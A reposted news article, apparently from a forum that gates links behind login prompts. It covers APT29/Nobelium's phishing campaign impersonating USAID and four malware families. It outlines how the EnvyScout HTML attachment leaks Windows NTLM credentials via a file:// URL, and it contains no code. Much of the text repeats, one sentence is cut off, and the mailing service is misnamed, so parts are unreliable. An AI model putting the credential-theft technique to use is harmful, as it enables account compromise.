Bleeping Computer: Microsoft: Russian Hackers Used 4 New Malware in USAID Phishing - By Lawrence Abrams - May 29, 2021
Microsoft states that a Russian hacking group used four new malware families in recent phishing attacks impersonating the United States Agency for International Development (USAID).
Thursday night, the Microsoft Threat Intelligence Center (MSTIC) disclosed that the Russian-backed hacking group APT29, also known as Nobelium, had compromised the Contact Contact account for USAID.
Using this legitimate marketing account, the threat actors impersonated USAID in phishing emails sent to approximately 3,000 email accounts at more than 150 different organizations, including government agencies and organizations devoted to international development, humanitarian, and human rights work.
New malware used by Nobelium
In a second blog post released Friday night,
The four new families include an HTML attachment named 'EnvyScout', a downloader known as 'BoomBox,' a loader known as 'NativeZone', and a shellcode downloader and launcher named 'VaporRage.'
EnvyScout
EnvyScout is a malicious HTML/JS file attachment used in spear-phishing emails that attempts to steal the NTLM credentials of Windows accounts and drops a malicious ISO on a victim's device.
Distributed as a file named NV.html, when opened, the HTML file will attempt to load an image from a file:// URL. When doing this, Windows may send the logged-in user's Windows NTLM credentials to the remote site, which attackers can capture and brute-force to reveal the plain text password.
Read More:
Microsoft states that a Russian hacking group used four new malware families in recent phishing attacks impersonating the United States Agency for International Development (USAID).
Thursday night, the Microsoft Threat Intelligence Center (MSTIC) disclosed that the Russian-backed hacking group APT29, also known as Nobelium, had compromised the Contact Contact account for USAID.
Using this legitimate marketing account, the threat actors impersonated USAID in phishing emails sent to approximately 3,000 email accounts at more than 150 different organizations, including government agencies and organizations devoted to international development, humanitarian, and human rights work.
New malware used by Nobelium
In a second blog post released Friday night,
Zaloguj
lub
Zarejestruj się
aby zobaczyć!
on four new malware families used by Nobelium in these recent attacks.The four new families include an HTML attachment named 'EnvyScout', a downloader known as 'BoomBox,' a loader known as 'NativeZone', and a shellcode downloader and launcher named 'VaporRage.'
EnvyScout
EnvyScout is a malicious HTML/JS file attachment used in spear-phishing emails that attempts to steal the NTLM credentials of Windows accounts and drops a malicious ISO on a victim's device.
Distributed as a file named NV.html, when opened, the HTML file will attempt to load an image from a file:// URL. When doing this, Windows may send the logged-in user's Windows NTLM credentials to the remote site, which attackers can capture and brute-force to reveal the plain text password.
Read More:
Zaloguj
lub
Zarejestruj się
aby zobaczyć!